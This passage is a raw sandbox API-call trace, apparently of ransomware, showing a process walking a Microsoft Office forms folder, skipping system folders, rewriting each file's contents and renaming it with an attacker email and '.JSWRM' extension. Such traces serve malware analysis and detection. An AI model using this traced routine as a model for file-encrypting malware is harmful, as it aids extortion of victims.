lstrcmpiW (lpString1="POSTITS.ICO", lpString2="documents and settings") returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="system volume information") returned -1 [0130.003] lstrcmpiW (lpString1="POSTITS.ICO", lpString2="msocache") returned 1 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTITS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTITS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTITS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.004] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.005] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.005] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.006] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.006] CloseHandle (hObject=0x314) returned 1 [0130.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postits.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTITS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postits.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.033] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POSTL.ICO", cAlternateFileName="")) returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2=".") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="..") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="...") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="windows") returned -1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="recovery") returned -1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="perflogs") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="documents and settings") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="system volume information") returned -1 [0130.033] lstrcmpiW (lpString1="POSTL.ICO", lpString2="msocache") returned 1 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTL.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTL.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.035] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.035] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.035] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.036] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.036] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.037] CloseHandle (hObject=0x314) returned 1 [0130.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\postl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.038] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="POSTS.ICO", cAlternateFileName="")) returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2=".") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="..") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="...") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="windows") returned -1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="recovery") returned -1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="perflogs") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="documents and settings") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="system volume information") returned -1 [0130.038] lstrcmpiW (lpString1="POSTS.ICO", lpString2="msocache") returned 1 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTS.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTS.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\posts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.040] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.040] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.040] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.042] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.042] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.042] CloseHandle (hObject=0x314) returned 1 [0130.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\posts.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\POSTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\posts.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.043] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x328, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RCLRPT.CFG", cAlternateFileName="")) returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2=".") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="..") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="...") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="windows") returned -1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="recovery") returned -1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="perflogs") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="documents and settings") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="system volume information") returned -1 [0130.043] lstrcmpiW (lpString1="RCLRPT.CFG", lpString2="msocache") returned 1 [0130.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RCLRPT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RCLRPT.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RCLRPT.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RCLRPT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RCLRPT.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RCLRPT.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rclrpt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.046] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=808) returned 1 [0130.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.046] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x320, lpOverlapped=0x0) returned 1 [0130.047] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.047] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x320, lpOverlapped=0x0) returned 1 [0130.047] CloseHandle (hObject=0x314) returned 1 [0130.047] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rclrpt.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RCLRPT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rclrpt.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.048] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x651, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REC.CFG", cAlternateFileName="")) returned 1 [0130.048] lstrcmpiW (lpString1="REC.CFG", lpString2=".") returned 1 [0130.048] lstrcmpiW (lpString1="REC.CFG", lpString2="..") returned 1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="...") returned 1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="windows") returned -1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="recovery") returned -1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="perflogs") returned 1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="documents and settings") returned 1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="system volume information") returned -1 [0130.049] lstrcmpiW (lpString1="REC.CFG", lpString2="msocache") returned 1 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REC.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REC.CFG", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REC.CFG", lpUsedDefaultChar=0x0) returned 7 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REC.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REC.CFG", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REC.CFG", lpUsedDefaultChar=0x0) returned 7 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.050] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1617) returned 1 [0130.050] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.050] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x650, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e534*=0x650, lpOverlapped=0x0) returned 1 [0130.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.052] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e530*=0x650, lpOverlapped=0x0) returned 1 [0130.052] CloseHandle (hObject=0x314) returned 1 [0130.052] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rec.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REC.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\rec.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.053] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RECL.ICO", cAlternateFileName="")) returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2=".") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="..") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="...") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="windows") returned -1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="recovery") returned -1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="perflogs") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="documents and settings") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="system volume information") returned -1 [0130.053] lstrcmpiW (lpString1="RECL.ICO", lpString2="msocache") returned 1 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECL.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECL.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft 